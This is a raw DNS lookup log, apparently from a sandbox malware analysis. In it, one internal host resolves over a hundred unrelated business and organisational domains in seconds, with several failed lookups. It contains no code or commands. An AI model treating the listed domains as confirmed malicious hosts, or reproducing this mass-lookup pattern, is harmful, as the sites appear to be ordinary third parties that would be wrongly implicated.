                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.445957899 CEST8.8.8.8192.168.2.30x6f4fNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.618989944 CEST8.8.8.8192.168.2.30x1b0bNo error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.644190073 CEST8.8.8.8192.168.2.30x7addNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.695894003 CEST8.8.8.8192.168.2.30x6c82Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.725610971 CEST8.8.8.8192.168.2.30xf3e5No error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.725610971 CEST8.8.8.8192.168.2.30xf3e5No error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.766546011 CEST8.8.8.8192.168.2.30xc573No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.783756018 CEST8.8.8.8192.168.2.30xf389No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.813791037 CEST8.8.8.8192.168.2.30x242No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.813791037 CEST8.8.8.8192.168.2.30x242No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.818182945 CEST8.8.8.8192.168.2.30x90dcNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.941032887 CEST8.8.8.8192.168.2.30x5e1fNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.950725079 CEST8.8.8.8192.168.2.30x44d8No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.950725079 CEST8.8.8.8192.168.2.30x44d8No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.964595079 CEST8.8.8.8192.168.2.30x6f5bNo error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.998656034 CEST8.8.8.8192.168.2.30x8761No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.998656034 CEST8.8.8.8192.168.2.30x8761No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.998656034 CEST8.8.8.8192.168.2.30x8761No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.998656034 CEST8.8.8.8192.168.2.30x8761No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.034918070 CEST8.8.8.8192.168.2.30xb499Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.049278021 CEST8.8.8.8192.168.2.30x1d0dNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.059875965 CEST8.8.8.8192.168.2.30xcb3cName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.103029966 CEST8.8.8.8192.168.2.30x248bNo error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.103029966 CEST8.8.8.8192.168.2.30x248bNo error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.151557922 CEST8.8.8.8192.168.2.30x396dName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.166456938 CEST8.8.8.8192.168.2.30xca7dNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.166456938 CEST8.8.8.8192.168.2.30xca7dNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.216991901 CEST8.8.8.8192.168.2.30x4fdcNo error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.266199112 CEST8.8.8.8192.168.2.30x2cbbNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.290903091 CEST8.8.8.8192.168.2.30x6fe0No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.328860998 CEST8.8.8.8192.168.2.30x5ed8No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.383997917 CEST8.8.8.8192.168.2.30xcac1No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.390809059 CEST8.8.8.8192.168.2.30x4cdName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.408041000 CEST8.8.8.8192.168.2.30xe15aServer failure (2)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.437213898 CEST8.8.8.8192.168.2.30x4177No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.437213898 CEST8.8.8.8192.168.2.30x4177No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.478946924 CEST8.8.8.8192.168.2.30xf5e0Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.631455898 CEST8.8.8.8192.168.2.30x657dNo error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.638926029 CEST8.8.8.8192.168.2.30xbdebName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.699707985 CEST8.8.8.8192.168.2.30x8b45No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.699707985 CEST8.8.8.8192.168.2.30x8b45No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.730518103 CEST8.8.8.8192.168.2.30xf7b2Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.759377956 CEST8.8.8.8192.168.2.30xf7d7Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.797077894 CEST8.8.8.8192.168.2.30xeeddNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.797077894 CEST8.8.8.8192.168.2.30xeeddNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.806407928 CEST8.8.8.8192.168.2.30x6b99No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.808747053 CEST8.8.8.8192.168.2.30x9630No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.820180893 CEST8.8.8.8192.168.2.30xa88aName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.858391047 CEST8.8.8.8192.168.2.30x16cdNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.858391047 CEST8.8.8.8192.168.2.30x16cdNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.939910889 CEST8.8.8.8192.168.2.30xda02No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.959042072 CEST8.8.8.8192.168.2.30xc1c6No error (0)rkengg.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.959042072 CEST8.8.8.8192.168.2.30xc1c6No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.959042072 CEST8.8.8.8192.168.2.30xc1c6No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.959042072 CEST8.8.8.8192.168.2.30xc1c6No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.964231968 CEST8.8.8.8192.168.2.30x1a4bNo error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.964231968 CEST8.8.8.8192.168.2.30x1a4bNo error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.966636896 CEST8.8.8.8192.168.2.30x1dd3No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.081377983 CEST8.8.8.8192.168.2.30x4c7fNo error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.121906996 CEST8.8.8.8192.168.2.30xd67No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.128113031 CEST8.8.8.8192.168.2.30xe421No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.169595003 CEST8.8.8.8192.168.2.30xf2c3No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.169595003 CEST8.8.8.8192.168.2.30xf2c3No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.169595003 CEST8.8.8.8192.168.2.30xf2c3No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.192780018 CEST8.8.8.8192.168.2.30x3c59No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.267947912 CEST8.8.8.8192.168.2.30x1559No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.271063089 CEST8.8.8.8192.168.2.30xc96eNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.401720047 CEST8.8.8.8192.168.2.30x28b5No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.401720047 CEST8.8.8.8192.168.2.30x28b5No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.401720047 CEST8.8.8.8192.168.2.30x28b5No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.429033041 CEST8.8.8.8192.168.2.30x35f6No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.519220114 CEST8.8.8.8192.168.2.30x70adNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.602751970 CEST8.8.8.8192.168.2.30xf1cdNo error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.627774000 CEST8.8.8.8192.168.2.30xcb3cServer failure (2)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.761921883 CEST8.8.8.8192.168.2.30x4d26No error (0)dspears.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.761921883 CEST8.8.8.8192.168.2.30x4d26No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.761921883 CEST8.8.8.8192.168.2.30x4d26No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.761921883 CEST8.8.8.8192.168.2.30x4d26No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.847161055 CEST8.8.8.8192.168.2.30x3c25No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.847161055 CEST8.8.8.8192.168.2.30x3c25No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.847161055 CEST8.8.8.8192.168.2.30x3c25No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.847161055 CEST8.8.8.8192.168.2.30x3c25No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.950079918 CEST8.8.8.8192.168.2.30x8ae0No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.965696096 CEST8.8.8.8192.168.2.30xca1cNo error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.065795898 CEST8.8.8.8192.168.2.30x2e3fNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.307638884 CEST8.8.8.8192.168.2.30x15b4No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.327425003 CEST8.8.8.8192.168.2.30x8d95No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.350899935 CEST8.8.8.8192.168.2.30x70e4No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.385746956 CEST8.8.8.8192.168.2.30xee81No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.421361923 CEST8.8.8.8192.168.2.30x86caNo error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.465491056 CEST8.8.8.8192.168.2.30x5084No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.465491056 CEST8.8.8.8192.168.2.30x5084No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.465491056 CEST8.8.8.8192.168.2.30x5084No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.616410971 CEST8.8.8.8192.168.2.30x5bbdNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.637805939 CEST8.8.8.8192.168.2.30xcefaNo error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.643820047 CEST8.8.8.8192.168.2.30xa087No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.669898033 CEST8.8.8.8192.168.2.30x306dServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.685683966 CEST8.8.8.8192.168.2.30xf86cNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.685683966 CEST8.8.8.8192.168.2.30xf86cNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.685683966 CEST8.8.8.8192.168.2.30xf86cNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.685683966 CEST8.8.8.8192.168.2.30xf86cNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.909326077 CEST8.8.8.8192.168.2.30x4e32No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.123841047 CEST8.8.8.8192.168.2.30x81e4No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.148962021 CEST8.8.8.8192.168.2.30x48daNo error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.301898003 CEST8.8.8.8192.168.2.30xbe79No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.462738037 CEST8.8.8.8192.168.2.30xf497No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.477328062 CEST8.8.8.8192.168.2.30xe8a4No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.728127956 CEST8.8.8.8192.168.2.30x3b36No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.728127956 CEST8.8.8.8192.168.2.30x3b36No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.728127956 CEST8.8.8.8192.168.2.30x3b36No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.728127956 CEST8.8.8.8192.168.2.30x3b36No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:36.122215986 CEST8.8.8.8192.168.2.30xce4cNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:36.207323074 CEST8.8.8.8192.168.2.30xe190No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.188091040 CEST8.8.8.8192.168.2.30xeeaaNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.188091040 CEST8.8.8.8192.168.2.30xeeaaNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.193109989 CEST8.8.8.8192.168.2.30xb00eNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.193109989 CEST8.8.8.8192.168.2.30xb00eNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.295783997 CEST8.8.8.8192.168.2.30xc4e0Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.453881025 CEST8.8.8.8192.168.2.30x3e73Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.287065029 CEST8.8.8.8192.168.2.30xf0aServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.515913963 CEST8.8.8.8192.168.2.30x7772No error (0)arowines.com75.2.18.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.535851002 CEST8.8.8.8192.168.2.30xb2c1No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.549524069 CEST8.8.8.8192.168.2.30x9ec7No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.551981926 CEST8.8.8.8192.168.2.30x94c8No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.590728998 CEST8.8.8.8192.168.2.30xd22bServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.723897934 CEST8.8.8.8192.168.2.30xf58fName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.240077019 CEST8.8.8.8192.168.2.30xe681No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.272066116 CEST8.8.8.8192.168.2.30x45d0No error (0)webways.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.272066116 CEST8.8.8.8192.168.2.30x45d0No error (0)webways.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.416081905 CEST8.8.8.8192.168.2.30xb0c1No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.448087931 CEST8.8.8.8192.168.2.30xb6e5No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.448087931 CEST8.8.8.8192.168.2.30xb6e5No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.537297964 CEST8.8.8.8192.168.2.30x743eNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.638866901 CEST8.8.8.8192.168.2.30x6d02No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.659446001 CEST8.8.8.8192.168.2.30x56d6No error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.688997984 CEST8.8.8.8192.168.2.30x2165Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.769224882 CEST8.8.8.8192.168.2.30xb6aaNo error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.027816057 CEST8.8.8.8192.168.2.30x6e13No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.027816057 CEST8.8.8.8192.168.2.30x6e13No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.027816057 CEST8.8.8.8192.168.2.30x6e13No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.027816057 CEST8.8.8.8192.168.2.30x6e13No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.563180923 CEST8.8.8.8192.168.2.30xc734No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.967077017 CEST8.8.8.8192.168.2.30x68dNo error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.967077017 CEST8.8.8.8192.168.2.30x68dNo error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:41.198637009 CEST8.8.8.8192.168.2.30x5466No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:41.451509953 CEST8.8.8.8192.168.2.30xc7abNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:41.685599089 CEST8.8.8.8192.168.2.30x98abNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:41.953658104 CEST8.8.8.8192.168.2.30xdb88Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:42.468157053 CEST8.8.8.8192.168.2.30x55a7No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:42.695311069 CEST8.8.8.8192.168.2.30xb11aNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:42.796525002 CEST8.8.8.8192.168.2.30xf8c6No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.019614935 CEST8.8.8.8192.168.2.30x77aaNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.019614935 CEST8.8.8.8192.168.2.30x77aaNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.019614935 CEST8.8.8.8192.168.2.30x77aaNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.019614935 CEST8.8.8.8192.168.2.30x77aaNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.515065908 CEST8.8.8.8192.168.2.30xb045No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.716730118 CEST8.8.8.8192.168.2.30xef4cNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.716730118 CEST8.8.8.8192.168.2.30xef4cNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.716730118 CEST8.8.8.8192.168.2.30xef4cNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.716730118 CEST8.8.8.8192.168.2.30xef4cNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.933396101 CEST8.8.8.8192.168.2.30xb945No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
